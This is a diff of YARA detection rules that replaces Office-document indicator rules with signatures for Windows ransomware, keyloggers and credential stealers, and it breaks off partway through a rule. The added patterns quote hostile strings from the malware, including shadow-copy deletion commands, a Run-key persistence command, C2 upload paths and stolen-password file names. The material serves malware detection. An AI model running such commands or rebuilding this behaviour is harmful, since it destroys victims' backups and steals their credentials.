-		$ax1 = "_Layout" ascii
-		$ax2 = "MultiPage1_" ascii
-		$ax3 = "_MouseMove" ascii
-		$ax4 = "_MouseHover" ascii
-		$ax5 = "_MouseLeave" ascii
-		$ax6 = "_MouseEnter" ascii
-		$ax7 = "ImageCombo21_Change" ascii
-		$ax8 = "InkEdit1_GotFocus" ascii
-		$ax9 = "InkPicture1_" ascii
-		$ax10 = "SystemMonitor1_" ascii
-		$ax11 = "WebBrowser1_" ascii
-		$ax12 = "_Click" ascii
-		$kw1 = "CreateObject" ascii
-		$kw2 = "CreateTextFile" ascii
-		$kw3 = ".SpawnInstance_" ascii
-		$kw4 = "WScript.Shell" ascii
-		$kw5 = { 43 68 72 [0-2] 41 73 63 [0-2] 4d 69 64 }
-		$kw6 = { 43 68 [0-2] 72 24 28 40 24 28 22 26 48 }
-		$kw7 = { 41 63 74 69 76 65 44 6f 63 75 6d 65 6e 74 }
+		$s1 = "Go build ID: " ascii
+		$s2 = "taskkill.exe" ascii
+		$s3 = "cmd.exe" ascii
+		$s4 = "Speak.Speak" ascii
+		$s5 = "CLNTSRVRnull" ascii
+		$s6 = "-----END" ascii
+		$s7 = "-----BEGIN" ascii
+		$s8 = ".EncryptFile" ascii
+		$g1 = "GoldenAxe/Utils." ascii
+		$g2 = "GoldenAxe/Cryptography." ascii
+		$g3 = "GoldenAxe/Walker." ascii
+		$g4 = "C:/Users/alpha/go/src/GoldenAxe/" ascii
+		$g5 = "'Golden Axe ransomware'" ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and $vb and 1 of ( $ax* ) and 2 of ( $kw* )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $g* ) and 1 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Suspicious_MITRE_T1117 : T1117 FILE
+rule DITEKSHEN_MALWARE_Win_Robbinhood : FILE
 {
 	meta:
-		description = "Detects MITRE technique T1117 in OLE documents"
+		description = "Robbinhood ransomware payload"
 		author = "ditekSHen"
-		id = "0f41b011-2b63-581f-aa10-9560f27d0a27"
+		id = "a5066a22-3c87-5e9f-a94f-5a44af2f96fd"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L678-L689"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L765-L787"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f0d97f4de8bde18299ee0caee680a15070a1faa99fc318d144a7b7918c8cbb1f"
-		score = 50
-		quality = 45
-		tags = "T1117, FILE"
+		logic_hash = "f1c4226ed5cb1583418d5ef0efc2c2b5bc3cfe7f148f359c5d432fd660331a46"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.Robbinhood"
 
 	strings:
-		$s1 = "scrobj.dll" ascii nocase
-		$s2 = "regsvr32" ascii nocase
-		$s3 = "JyZWdzdnIzMi5leGU" ascii
-		$s4 = "HNjcm9iai5kbGw" ascii
+		$go = "Go build ID:" ascii
+		$cmd1 = "cmd.exe /c" ascii
+		$cmd2 = "net use * /DELETE" nocase ascii
+		$cmd3 = "sc.exe stop" ascii
+		$cmd4 = "vssadmin resize shadowstorage" nocase ascii
+		$s1 = /Skipping\s(file|dir)/ ascii
+		$s2 = "Encrypt[ERR] GET Size:" ascii
+		$s3 = ".taskkilltasklistunknown(" ascii
+		$s4 = ".sysvssadmin.exewevtutil.exe MB released" ascii
+		$s5 = ".sysvssadmin.exewevtutil.exewinlogin.exewinlogon.exe MB released" ascii
+		$s6 = ".enc_robbinhood" ascii
+		$s7 = "c:\\windows\\temp\\pub.key" nocase ascii
+		$s8 = "main.CoolMaker" ascii
+		$s9 = "/valery/go/src/oldboy/" ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and 2 of them
+		uint16( 0 ) == 0x5a4d and ( $go and 1 of ( $cmd* ) and 3 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Remotetemplate
+rule DITEKSHEN_MALWARE_Win_Getcrypt : FILE
 {
 	meta:
-		description = "Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents"
+		description = "GetCrypt ransomware payload"
 		author = "ditekSHen"
-		id = "fbf40436-fc0a-5e55-89ac-5e1dd93e1833"
+		id = "fb6db807-372f-59e6-96c6-54dd4ece336d"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L691-L702"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L789-L825"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "80cc5b1a8a8899f632401956055374d265c734449e56ffeee5f0ba4911050f36"
+		logic_hash = "fd7ee98757c3ac1f2b2a4dd9041c78d33273d7a7d596c3d99c6b8d79988f29f1"
 		score = 75
-		quality = 75
-		tags = ""
+		quality = 73
+		tags = "FILE"
+		clamav_sig1 = "MALWARE_Win.Ransomware.GetCrypt-1"
+		clamav_sig2 = "MALWARE_Win.Ransomware.GetCrypt-2"
 
 	strings:
-		$olerel = "relationships/oleObject" ascii
-		$target1 = "Target=\"http" ascii
-		$target2 = "Target=\"file" ascii
-		$mode = "TargetMode=\"External" ascii
+		$x1 = "delete shadows /all /quiet" wide
+		$x2 = "C:\\Windows\\System32\\svchost.exe" fullword wide
+		$x3 = "desk.bmp" fullword wide
+		$x4 = ":\\Boot" fullword wide
+		$x5 = "\\encrypted_key.bin" fullword wide
+		$x6 = "vssadmin.exe" fullword wide
+		$x7 = ":\\Recovery" fullword wide
+		$s1 = "CryptEncrypt" fullword ascii
+		$s2 = "NtWow64ReadVirtualMemory64" fullword ascii
+		$s3 = "MPR.dll" fullword ascii
+		$s4 = "%key%" fullword ascii
+		$s5 = "CryptDestroyKey" fullword ascii
+		$s6 = "ntdll.dll" fullword ascii
+		$s7 = "WNetCancelConnection2W" fullword ascii
+		$s8 = ".%c%c%c%c" fullword wide
+		$s10 = { 43 72 79 70 74 49 6d 70 6f 72 74 4b 65 79 00 00
+                 cb 00 43 72 79 70 74 45 6e 63 72 79 70 74 00 00
+                 c1 00 43 72 79 70 74 41 63 71 75 69 72 65 43 6f
+                 6e 74 65 78 74 41 00 00 c8 00 43 72 79 70 74 44
+                 65 73 74 72 6f 79 4b 65 79 00 d2 00 43 72 79 70
+                 74 47 65 6e 52 61 6e 64 6f 6d 00 00 c2 00 43 72
+                 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78
+                 74 57 00 00 41 44 56 41 50 49 33 32 2e 64 6c 6c
+                 00 00 b5 01 53 68 65 6c 6c 45 78 65 63 75 74 65
+                 45 78 57 00 53 48 45 4c 4c 33 32 2e 64 6c 6c 00 }
 
 	condition:
-		$olerel and $mode and 1 of ( $target* )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 8 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_Malver_Objects : FILE
+rule DITEKSHEN_MALWARE_Joego : FILE
 {
 	meta:
-		description = "Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents."
+		description = "JoeGo ransomware payload"
 		author = "ditekSHen"
-		id = "2d9d80e0-473e-5aac-a576-8f0002e120e2"
+		id = "23d38bcd-e66d-5ff1-ad6a-3e6432d83562"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L704-L718"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L827-L847"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "69136fb8ba180f6f86e569471bcefe8f55c61af73c66ebd6062ba7369aee9a72"
+		logic_hash = "3ddf3506aefb3cd1845f9daa689848a02a2422ca98c5c984bc918cc7ea2b2677"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.JoeGo"
 
 	strings:
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
+		$go = "Go build ID:" ascii
+		$s1 = "%SystemRoot%\\system32\\%v." ascii
+		$s2 = "REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V" ascii
+		$s3 = "/t REG_SZ /F /D %userprofile%\\" ascii
+		$s4 = "(sensitive) [recovered]" ascii
+		$s5 = "/dev/stderr/dev/stdout/index.html" ascii
+		$s6 = "%userprofile%\\SystemApps" ascii
+		$s7 = "p=<br>ACDTACSTAEDTAESTAKDTAKSTAWSTA" ascii
+		$cnc1 = "/detail.php" ascii
+		$cnc2 = "/checkin.php" ascii
+		$cnc3 = "/platebni_brana.php" ascii
+		$cnc4 = "://nebezpecnyweb.eu/" ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( ( not uint8( 4 ) == 0x66 or not uint8( 5 ) == 0x31 or not uint8( 6 ) == 0x5c ) and 1 of ( $obj* ) )
+		uint16( 0 ) == 0x5a4d and $go and ( all of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $cnc* ) ) )
 }
-rule DITEKSHEN_INDICATOR_PPT_Mastermana : FILE
+rule DITEKSHEN_MALWARE_Win_Aurora : FILE
 {
 	meta:
-		description = "Detects known malicious pattern (MasterMana) in PowerPoint documents."
+		description = "Aurora ransomware payload"
 		author = "ditekSHen"
-		id = "8e9b8185-6211-54c6-946d-b16f2226312a"
+		id = "d3eafe9c-c8d9-5744-ba5d-4eb0249cceea"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L720-L740"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L849-L869"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f8169e63b22fbbd48de9a63ff228d9d9fb105e95d2ea8a37c0993493515e8b2e"
+		logic_hash = "056bb11e8b947ef90462503db82b2001e4a5d4847fad9c0d5d771384a80d779a"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$a1 = "auto_close" ascii nocase
-		$a2 = "autoclose" ascii nocase
-		$a3 = "auto_open" ascii nocase
-		$a4 = "autoopen" ascii nocase
-		$vb1 = "\\VBE7.DLL" ascii
-		$vb2 = { 41 74 74 72 69 62 75 74 ?? 65 20 56 42 5f 4e 61 6d ?? 65 }
-		$clsid = "000204EF-0000-0000-C000-000000000046" wide nocase
-		$i1 = "@j.mp/" ascii wide
-		$i2 = "j.mp/" ascii wide
-		$i3 = "\\pm.j\\\\:" ascii wide
-		$i4 = ".zz.ht/" ascii wide
-		$i5 = "/pm.j@" ascii wide
-		$i6 = "\\pm.j@" ascii wide
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii wide
+		$s2 = "#DECRYPT_MY_FILES#.txt" fullword ascii
+		$s3 = "/gen.php?generate=" fullword ascii
+		$s4 = "geoplugin.net/php.gp" ascii
+		$s5 = "/end.php?id=" fullword ascii
+		$s6 = "wotreplay" fullword ascii
+		$s7 = "moneywell" fullword ascii
+		$s8 = "{btc}" fullword ascii
+		$s9 = ".?AV_Locimp@locale@std@@" ascii
+		$s10 = ".?AV?$codecvt@DDU_Mbstatet@@@std@@" ascii
+		$s11 = ".?AU_Crt_new_delete@std@@" ascii
+		$pdb1 = "\\z0ddak\\Desktop\\source\\Release\\Ransom.pdb" ascii
+		$pdb2 = "\\Desktop\\source\\Release\\Ransom.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and 1 of ( $i* ) and $clsid and 1 of ( $a* ) and 1 of ( $vb* )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 5 of ( $s* ) ) or ( 8 of them ) )
 }
-rule DITEKSHEN_INDICATOR_XML_Webrelframe_Remotetemplate : FILE
+rule DITEKSHEN_MALWARE_Win_Buran : FILE
 {
 	meta:
-		description = "Detects XML web frame relations refrencing an external target in dropper OOXML documents"
+		description = "Buran ransomware payload"
 		author = "ditekSHen"
-		id = "724650db-8d58-5e73-92e7-287890babc3b"
+		id = "1433bac5-2ece-54bb-8e57-b5834fffc719"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L742-L752"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L871-L903"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fbe209e31ddb4369de02b6e91bf65f0588089c7b838dcf80f182248790b59e20"
+		logic_hash = "eaf50d824dbade0ca63fafc5b4a376553039de9b51a0f6387cb28c8f91a7e0b9"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.Buran"
 
 	strings:
-		$target1 = "/frame\" Target=\"http" ascii nocase
-		$target2 = "/frame\" Target=\"file" ascii nocase
-		$mode = "TargetMode=\"External" ascii
+		$v1_1 = "U?$error_info_injector@V" ascii
+		$v1_2 = "Browse for Folder (FTP)" fullword ascii
+		$v1_3 = "Find/Replace in Files" fullword ascii
+		$v1_4 = "PAHKLM" fullword ascii
+		$v1_5 = "PAHKCR" fullword ascii
+		$v1_6 = "chkOpt_" ascii
+		$h1 = "Search <a href=\"location\" class=\"menu\">in this folder</a>" ascii
+		$h2 = "<br>to find where the text below" ascii
+		$h3 = "</a> files with these extensions (separate with semi-colons)" ascii
+		$h4 = "Need help with <a href=\"" ascii
+		$path = "\\work\\cr\\nata\\libs\\boost_" wide
+		$v2_1 = "(ShlObj" fullword ascii
+		$v2_2 = "\\StreamUnit" fullword ascii
+		$v2_3 = "TReadme" fullword ascii
+		$v2_4 = "TDrivesAndShares" fullword ascii
+		$v2_5 = "TCustomMemoryStreamD" fullword ascii
+		$v2_6 = "OpenProcessToken" fullword ascii
+		$v2_7 = "UrlMon" fullword ascii
+		$v2_8 = "HttpSendRequestA" fullword ascii
+		$v2_9 = "InternetConnectA" fullword ascii
+		$v2_10 = "FindFiles" fullword ascii
+		$v2_12 = "$*@@@*$@@@$" ascii
 
 	condition:
-		uint32( 0 ) == 0x6d783f3c and ( 1 of ( $target* ) and $mode )
+		uint16( 0 ) == 0x5a4d and ( ( ( all of ( $v1* ) and 1 of ( $h* ) ) or ( $path and 2 of ( $v1* ) and 1 of ( $h* ) ) or 10 of them ) or all of ( $v2* ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL1 : FILE
+rule DITEKSHEN_MALWARE_Win_Masslogger : FILE
 {
 	meta:
-		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
+		description = "MassLogger keylogger payload"
 		author = "ditekSHen"
-		id = "4212d762-ea49-5884-b697-9313f43140d5"
+		id = "9181b89a-2ce8-59b6-9703-c01a8471b8d6"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L765-L789"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L905-L934"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a3248027b83b982cccf235267aa27def4f640987d41c5f11509bde3e27b82fee"
+		logic_hash = "7d8bbefa71a1eb20cd9d029bd516d6c37e39cfa053ed0617eace200d210d9b58"
 		score = 75
-		quality = 25
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "Macros Excel 4.0" fullword ascii
-		$s2 = { 00 4d 61 63 72 6f 31 85 00 }
-		$s3 = "http" ascii
-		$s4 = "file:" ascii
-		$fa_exe = ".exe" ascii nocase
-		$fa_scr = ".scr" ascii nocase
-		$fa_dll = ".dll" ascii nocase
-		$fa_bat = ".bat" ascii nocase
-		$fa_cmd = ".cmd" ascii nocase
-		$fa_sct = ".sct" ascii nocase
-		$fa_txt = ".txt" ascii nocase
-		$fa_psw = ".ps1" ascii nocase
-		$fa_py = ".py" ascii nocase
-		$fa_js = ".js" ascii nocase
+		$s1 = "MassLogger v" ascii wide
+		$s2 = "MassLogger Started:" ascii wide
+		$s3 = "MassLogger Process:" ascii wide
+		$s4 = "/panel/upload.php" wide
+		$s5 = "ftp://" wide
+		$s6 = "\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" fullword wide
+		$s7 = "^(.*/)?([^/\\\\.]+/\\\\.\\\\./)(.+)$" fullword wide
+		$s8 = "Bot Killer" ascii
+		$s9 = "Keylogger And Clipboard" ascii
+		$c1 = "costura.ionic.zip.reduced.dll.compressed" fullword ascii
+		$c2 = "CHECKvUNIQUEq" fullword ascii
+		$c3 = "HOOK/MEMORY6" fullword ascii
+		$c4 = "Massfile" ascii wide
+		$c5 = "Fz=[0-9]*'skips*" fullword ascii
+		$c6 = ":=65535zO" fullword ascii
+		$c7 = "!$!%!&!'!(!)!*!.!/!0!4!" fullword ascii
+		$c8 = "5!9!:!<!>!@!E!G!J!K!L!N!O!P!`!" fullword ascii
+		$c9 = "dllToLoad" fullword ascii
+		$c10 = "set_CreateNoWindow" fullword ascii
+		$c11 = "FtpWebRequest" fullword ascii
+		$c12 = "encryptedUsername" fullword ascii
+		$c13 = "encryptedPassword" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and ( 3 of ( $s* ) and 1 of ( $fa* ) )
+		( uint16( 0 ) == 0x5a4d and 9 of ( $c* ) ) or ( 5 of ( $s* ) or 9 of ( $c* ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL2 : FILE
+rule DITEKSHEN_MALWARE_Win_Echelon : FILE
 {
 	meta:
-		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
+		description = "Echelon information stealer payload"
 		author = "ditekSHen"
-		id = "ea331976-6e5d-5377-a100-0f265e97177f"
+		id = "e13d2003-c755-5dd3-bb16-8e41dd19a151"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L791-L812"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L936-L957"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48ab27a2f81934f6f2f034ebcd40fc083b0d90850d12a951f03dab3a4c396ec6"
-		score = 50
-		quality = 45
+		logic_hash = "c070bf52cc51dd334ea24614e33eaa2b7b1a17e7790e586cbbb8c7e33ba1bd76"
+		score = 75
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$e1 = "Macros Excel 4.0" ascii
-		$e2 = { 00 4d 61 63 72 6f 31 85 00 }
-		$a1 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
-		$a2 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
-		$a3 = { 18 00 21 00 20 00 00 01 12 00 00 00 00 00 00 00 00 00 01 3a ff }
-		$a4 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
-		$a5 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
-		$a6 = "auto_open" ascii nocase
-		$a7 = "auto_close" ascii nocase
-		$x1 = "* #,##0" ascii
-		$x2 = "=EXEC(CHAR(" ascii
-		$x3 = "-w 1 stARt`-s" ascii nocase
-		$x4 = ")&CHAR(" ascii
-		$x5 = "Reverse" fullword ascii
+		$s1 = "<GetStealer>b__" ascii
+		$s2 = "clearMac" fullword ascii
+		$s3 = "path2save" fullword ascii
+		$s4 = "Echelon_Size" fullword ascii
+		$s5 = "Echelon Stealer by" wide
+		$s6 = "get__masterPassword" fullword ascii
+		$s7 = "DomainDetect" fullword ascii
+		$s8 = "[^\\u0020-\\u007F]" fullword wide
+		$s9 = "/sendDocument?chat_id=" wide
+		$s10 = "//setting[@name='Password']/value" wide
+		$s11 = "Passwords_Mozilla.txt" fullword wide
+		$s12 = "Passwords_Edge.txt" fullword wide
+		$s13 = "@madcod" ascii wide
+		$pdb = "\\Echelon-Stealer-master\\obj\\Release\\Echelon.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and ( 1 of ( $e* ) and 1 of ( $a* ) and ( #x1 > 3 or 2 of ( $x* ) ) )
+		( uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or $pdb ) ) or ( 8 of ( $s* ) or $pdb )
 }
-rule DITEKSHEN_INDICATOR_RTF_Embedded_Excel_Urldownloadtofile : FILE
+rule DITEKSHEN_MALWARE_Win_Qulab
 {
 	meta:
-		description = "Detects RTF documents that embed Excel documents for detection evation."
+		description = "Qulab information stealer payload or artifacts"
 		author = "ditekSHen"
-		id = "39b8723c-1755-5e2f-8fb2-cca5e9eef915"
+		id = "6ae24c67-5700-5330-a3bd-d542162faebb"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L814-L840"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L959-L983"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9416664683c249a9dc2b3d506d9dea7067a638cc4ee5ef7138e5b33a8fcd2b96"
+		logic_hash = "659d828cbef38c6362b612be9bdc05ae820f49c23684e77af6462ea677133284"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
+		clamav_sig = "MALWARE.Win.Trojan.QulabZ-Stealer"
 
 	strings:
-		$clsid1 = "2008020000000000c000000000000046" ascii nocase
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
-		$ole5 = { 64 30 63 66 [0-2] 31 31 65 30 61 31 62 31 31 61 65 31 }
-		$ole6 = "D0cf11E" ascii nocase
-		$s1 = "55524c446f776e6c6f6164546f46696c6541" ascii nocase
-		$s2 = "55524c4d4f4e" ascii nocase
+		$x1 = "QULAB CLIPPER + STEALER" ascii wide
+		$x2 = "MASAD CLIPPER + STEALER" ascii wide
+		$x3 = "http://teleg.run/Qulab" ascii wide
+		$x4 = "http://teleg.run/jew_seller" ascii wide
+		$x5 = "BUY CLIPPER + STEALER" ascii wide
+		$s1 = "\\Screen.jpg" ascii wide
+		$s2 = "attrib +s +h \"" ascii wide
+		$s3 = "\\x86_microsoft-windows-" ascii wide
+		$s4 = "\\amd64_microsoft-windows-" ascii wide
+		$s5 = "Desktop TXT File" ascii wide
+		$s6 = "\\AutoFills.txt" ascii wide
+		$s7 = "\\CreditCards.txt" ascii wide
+		$s8 = "a -y -mx9 -ssw" ascii wide
+		$s9 = "\\Passwords.txt" ascii wide
+		$s10 = "\\Information.txt" ascii wide
+		$s11 = "\\getMe" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( 1 of ( $clsid* ) and 1 of ( $obj* ) and 1 of ( $ole* ) and 1 of ( $s* ) )
+		9 of them or ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or 1 of ( $x* ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL3 : FILE
+rule DITEKSHEN_MALWARE_Win_Orion : FILE
 {
 	meta:
-		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
+		description = "Orion Keylogger payload"
 		author = "ditekSHen"
-		id = "794cac49-e917-5282-8cbd-8ecf91a2dc9e"
+		id = "b380b93b-6ceb-5244-aeca-b1f8f9a5b553"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L842-L860"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L985-L1005"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "83eaf60b900119b9fcd458e9e9dda119fd71785821bf282e9385031368ff9891"
+		logic_hash = "9e5521ebaf9bdef6dadd2a2a093bd6f87ded023d9a74db126ac8ec9a5f1f9744"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$a1 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
-		$a2 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
-		$a3 = { 18 00 21 00 20 00 00 01 12 00 00 00 00 00 00 00 00 00 01 3a ff }
-		$a4 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
-		$a5 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
-		$a6 = "auto_open" ascii nocase
-		$a7 = "auto_close" ascii nocase
-		$s1 = "* #,##0" ascii
-		$s2 = "URLMon" ascii
-		$s3 = "DownloadToFileA" ascii
-		$s4 = "DllRegisterServer" ascii
+		$s1 = "\\Ranger.BrowserLogging" ascii wide nocase
+		$s2 = "GrabAccounts" fullword ascii
+		$s3 = "DownloadFile" fullword ascii
+		$s4 = "Internet Explorer Recovery" wide
+		$s5 = "Outlook Recovery" wide
+		$s6 = "Thunderbird Recovery" wide
+		$s7 = "Keylogs -" wide
+		$s8 = "WebCam_Capture.dll" wide
+		$s9 = " is not installed on this computer!" wide
+		$s10 = "cmd /c bfsvc.exe \"" wide
+		$s11 = "/Keylogs - PC:" fullword wide
+		$s12 = "/PC:" fullword wide
+		$s13 = "<p style=\"color:#CC7A00\">[" wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and 1 of ( $a* ) and all of ( $s* ) and #s1 > 3
+		( uint16( 0 ) == 0x5a4d and 5 of ( $s* ) ) or ( 6 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_DOC_Phishingpatterns : FILE
+rule DITEKSHEN_MALWARE_Win_Aspire : FILE
 {
 	meta:
-		description = "Detects OLE, RTF, PDF and OOXML (decompressed) documents with common phishing strings"
+		description = "Aspire Keylogger payload"
 		author = "ditekSHen"
-		id = "67372eb5-ed07-5062-a12e-9ad8c7070f0f"
+		id = "25724975-f373-553e-b27e-43168e956c16"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L862-L883"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1007-L1022"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "50b6566cb18512f887c07576391eb492101f7534da3460d5f7740ee6f4cf707d"
+		logic_hash = "3ea0136dbacb79e4c7556f562d17b26b84ac3e4c967b117021e2399ded0a0fdf"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "PERFORM THE FOLLOWING STEPS TO PERFORM DECRYPTION" ascii nocase
-		$s2 = "Enable Editing" ascii nocase
-		$s3 = "Enable Content" ascii nocase
-		$s4 = "WHY I CANNOT OPEN THIS DOCUMENT?" ascii nocase
-		$s5 = "You are using iOS or Android, please use Desktop PC" ascii nocase
